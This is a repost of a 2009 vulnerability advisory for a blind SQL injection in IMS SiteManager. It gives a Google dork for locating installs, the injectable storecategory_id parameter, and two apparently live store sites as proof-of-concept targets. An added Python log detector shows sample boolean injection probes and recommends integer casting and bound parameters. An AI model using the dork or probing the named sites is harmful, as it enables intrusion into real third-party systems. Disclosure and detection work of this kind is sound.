Saturday, September 19, 2009

IMS SiteManager Blind SQL Injection Vuln

[o]------------------------------------------------------------------------------------[x]
| Blind SQL Injection Vulnerability
|
[o]------------------------------------------------------------------------------------[o]
| Software : IMS SiteManager
|
| Vendor : www.sitemanager.ims.net
|
| Date : 13 sept 2009
|
| Author : zxvf
|
| Contact : paddy[at]antisecurity[dot]org
|
[o]------------------------------------------------------------------------------------[o]

[?] Google Dork

"Powered by IMS SiteManager"

[?] Exploit

http://[site]/index.php?storecategory_id=

[?] Proof of Concept

https://www.rainfordane.com/order/index.php?storecategory_id=247
https://www.downtownmadison.org/store/index.php?storecategory_id=223
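
[?] Detection (added example, not part of the original advisory or the vendor's code): a log check that flags requests where storecategory_id is not a plain integer. The log lines, IP addresses, and the assumption that valid IDs are 1-10 digits are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; client addresses are documentation-range placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Sep/2009:10:00:01 +0000] "GET /store/index.php?storecategory_id=223 HTTP/1.1" 200 5120
203.0.113.9 - - [19/Sep/2009:10:00:07 +0000] "GET /store/index.php?storecategory_id=223%20AND%201%3D1 HTTP/1.1" 200 5120
203.0.113.9 - - [19/Sep/2009:10:00:08 +0000] "GET /store/index.php?storecategory_id=223%20AND%201%3D2 HTTP/1.1" 200 812
198.51.100.2 - - [19/Sep/2009:10:01:00 +0000] "GET /store/index.php?page=2 HTTP/1.1" 200 4000
203.0.113.9 - - [19/Sep/2009:10:01:30 +0000] "GET /store/index.php?storecategory_id= HTTP/1.1" 200 700
"""

# Client address and request target from a common/combined log format line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
PARAM = "storecategory_id"
VALID_ID = re.compile(r"\d{1,10}")  # assumption: category IDs are short integers


def suspicious_requests(log_text):
    """Return (client, decoded_value) for every non-integer storecategory_id."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # skip lines that are not well-formed requests
        client, target = m.groups()
        # parse_qs percent-decodes values, so encoded payloads are compared in clear form
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(PARAM, []):
            if not VALID_ID.fullmatch(value):
                hits.append((client, value))
    return hits


def clients_to_review(log_text, threshold=2):
    """Clients with at least `threshold` malformed values, i.e. repeated probing."""
    counts = Counter(client for client, _ in suspicious_requests(log_text))
    return sorted(c for c, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client}\t{value!r}")
    print("review:", clients_to_review(SAMPLE_LOG))
```

This only surfaces probing in logs; the fix belongs in the application, which should cast storecategory_id to an integer and bind it as a query parameter.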

[o]------------------------------------------------------------------------------------[x]
| Greetz
|
[o]------------------------------------------------------------------------------------[o]
| AntiSecurity Crew
|
| Mainhack Crew
|
| Nob0dy Crew
|
| c0li, OoN_Boy, NoGe, paman, pizzyroot, noname, angela, eminem, xx_user,
|
| Special for Dipsy
|
| Armageddon Team, and all Indonesian hackers!
|
| BeHave oR BeGone !!!
|
[o]------------------------------------------------------------------------------------[o]
